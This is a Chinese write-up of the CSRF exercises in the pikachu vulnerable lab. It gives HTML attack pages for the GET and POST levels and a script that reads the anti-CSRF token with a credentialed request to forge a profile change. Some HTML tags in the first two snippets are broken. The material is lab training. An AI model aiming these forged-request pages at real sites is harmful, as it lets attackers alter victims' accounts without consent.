w28pikachu-csrf实例

pikachu-csrf实例

get级别

这里需要同时修改性别、手机、住址、邮箱。
w28pikachu-csrf实例_第1张图片
写一个简单的html文件,里面伪装修改密码的文字,代码如下:

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        a>
    body>
html>

w28pikachu-csrf实例_第2张图片
点击"pikachu-csrf-get"文字后,跳转到pikachu的csrf(get)界面,展示修改后的界面。

w28pikachu-csrf实例_第3张图片

post级别

这里post请求,需要通过表单提交。
写一个简单的html文件,里面伪装修改密码的文字,代码如下:

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        a>
    br>
    <form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php">
        <input id="sex" type="text" name="sex" value="5" />
        <input id="phonenum" type="text" name="phonenum" value="5" />
        <input id="add" type="text" name="add" value="5" />
        <input id="email" type="text" name="email" value="5" />
        <input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" />
    form>
    body>
    
html>

在这里插入图片描述

点击"pikachu-csrf-post"文字后,跳转到pikachu的csrf(post)界面,展示修改后的界面。
w28pikachu-csrf实例_第4张图片

token级别

这里get请求+token。
写一个简单的html文件,里面get请求拼接token,代码如下:

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        </a>
    </br>
    <form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php">
        <input id="sex" type="text" name="sex" value="5" />
        <input id="phonenum" type="text" name="phonenum" value="5" />
        <input id="add" type="text" name="add" value="5" />
        <input id="email" type="text" name="email" value="5" />
        <input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" />
    </form>
    </br>
    <a  href="javascript:void(0);" onclick="initJS()">
        pikachu-csrf-token
    </a>
    </body>
    <script >
        function initJS(){
            
            var theUrl = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php';
            if(window.XMLHttpRequest) {
                xmlhttp = new XMLHttpRequest();
            }else{
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
            }
            var count = 0;
            xmlhttp.withCredentials = true;
            xmlhttp.onreadystatechange=function(){
                if(xmlhttp.readyState ==4 && xmlhttp.status==200)
                {
                    var text = xmlhttp.responseText;

                    // 创建一个临时的 div 元素,并将 HTML 字符串设置为其 innerHTML  
                    var tempDiv = document.createElement('div');  
                    tempDiv.innerHTML = text;  
                    
                    // 从临时 div 中查找具有 name 属性为 "token" 的输入元素  
                    var tokenInput = tempDiv.querySelector('input[name="token"]');  
            
                    var token = tokenInput.value;  
                    console.log('Token Value:', token); // 在控制台输出 token 的值 
                    console.log('count',count);
                    var new_url = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php?sex=7&phonenum=7&add=7&email=7&token='+token+'&submit=submit';
                    console.log('newurl',new_url);        
                }
            };
            xmlhttp.open("GET",theUrl,false);
            xmlhttp.send();
        }
    </script>
    
</html>

w28pikachu-csrf实例_第5张图片
点击"pikachu-csrf-token"文字后,在控制台中查看newurl,并复制下来输入到浏览器中。
w28pikachu-csrf实例_第6张图片
w28pikachu-csrf实例_第7张图片
刷新csrf token,展示了修改后的信息。
w28pikachu-csrf实例_第8张图片
破解成功

你可能感兴趣的:(csrf,android,前端)